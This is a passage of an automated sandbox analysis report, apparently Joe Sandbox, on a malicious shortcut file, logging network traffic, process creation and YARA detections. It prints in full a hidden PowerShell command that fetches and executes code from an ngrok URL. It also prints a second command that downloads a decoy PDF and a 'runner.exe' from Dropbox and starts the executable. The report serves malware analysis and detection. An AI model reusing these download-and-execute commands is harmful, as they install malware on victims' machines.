00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.7:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.7:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.7:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.7:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.7:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.7:49794 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.7:49830 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,31_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,31_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,34_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004D9C20 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,CloseClipboard,31_2_004D9C20
                      Source: 1061714629.exe, 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_828855c6-3
                      Source: 1061714629.exe, 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_6c2dff4a-b
                      Source: Yara matchFile source: 35.3.fontdrvhost.exe.52f0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.3.fontdrvhost.exe.52f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.1061714629.exe.30d0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.3.fontdrvhost.exe.5510000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.3.fontdrvhost.exe.52f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.1061714629.exe.2eb0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.1061714629.exe.30d0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000003.1907566147.0000000005510000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.1900624888.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1061714629.exe PID: 9716, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 9784, type: MEMORYSTR

                      System Summary

                      barindex
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeFile dump: DiskTuner.exe.31.dr 979567349Jump to dropped file
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1061714629.exeJump to dropped file
                      Windows shortcut file (LNK) contains suspicious command line arguments
                      Source: l92fYljXWF.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                      Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_000001C0D3F11CF4 NtAcceptConnectPort,CloseHandle,39_2_000001C0D3F11CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_000001C0D3F11AA4 NtAcceptConnectPort,NtAcceptConnectPort,39_2_000001C0D3F11AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_000001C0D3F115C0 NtAcceptConnectPort,39_2_000001C0D3F115C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_000001C0D3F10AC8 NtAcceptConnectPort,NtAcceptConnectPort,39_2_000001C0D3F10AC8
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB794D0B4_2_00007FFAAB794D0B
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0040A02031_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0042D30031_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0043C3C031_2_0043C3C0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0042D39B31_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0042D4F931_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0041B4B031_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0042067031_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0041662131_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0045E87031_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0047DA0031_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0040ACD031_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_00429E1031_2_00429E10
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_00464EE031_2_00464EE0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007A81D234_3_007A81D2
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_0079C23134_3_0079C231
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_0079C40034_3_0079C400
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0040A02034_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0042D30034_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0042D39B34_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_004033A134_2_004033A1
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0042D4F934_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0041B4B034_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0042067034_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0041662134_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0045E87034_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0047DA0034_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_0040ACD034_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00429E1034_2_00429E10
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00464EE034_2_00464EE0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_000001C0D3F10C7039_2_000001C0D3F10C70
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1061714629.exe 42458188732FFAD7AC8223445549DFD5A1B5DFDC48BDDB5DDD1286A22040EFE9
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe 11BA48C61A24E61ECA3D3A83EC1815F0FDBFE8EBDEA5521A1C661A01DBBB96FC
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: String function: 00435140 appears 66 times
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: String function: 004C9120 appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: String function: 0079CD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: String function: 00435350 appears 68 times
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9716 -s 432
                      Source: 1061714629.exe, 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000002.1933806524.0000000002489000.00000040.00001000.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1897292641.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1903619913.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                      Source: 1061714629.exe, 1061714629.exe, 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000002.1933806524.0000000002489000.00000040.00001000.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1897292641.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1903619913.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                      Source: classification engineClassification label: mal100.troj.evad.winLNK@82/286@21/15
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004F9340 CoCreateInstance,31_2_004F9340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-f4ab12c4-c0a0-d82844-6f0e29b94802}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9952
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ips34dix.ewh.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: l92fYljXWF.lnkReversingLabs: Detection: 23%
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,11252939231684857170,10877690503001788622,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6812 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7096 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7816 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\1902382389.pdf
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8424 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:6
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2068,i,17729385765362117202,6061086307016693988,262144 /prefetch:3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1061714629.exe "C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Users\user\AppData\Local\Temp\1061714629.exe "C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9716 -s 432
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9952 -s 140
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6992 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" "Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,11252939231684857170,10877690503001788622,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
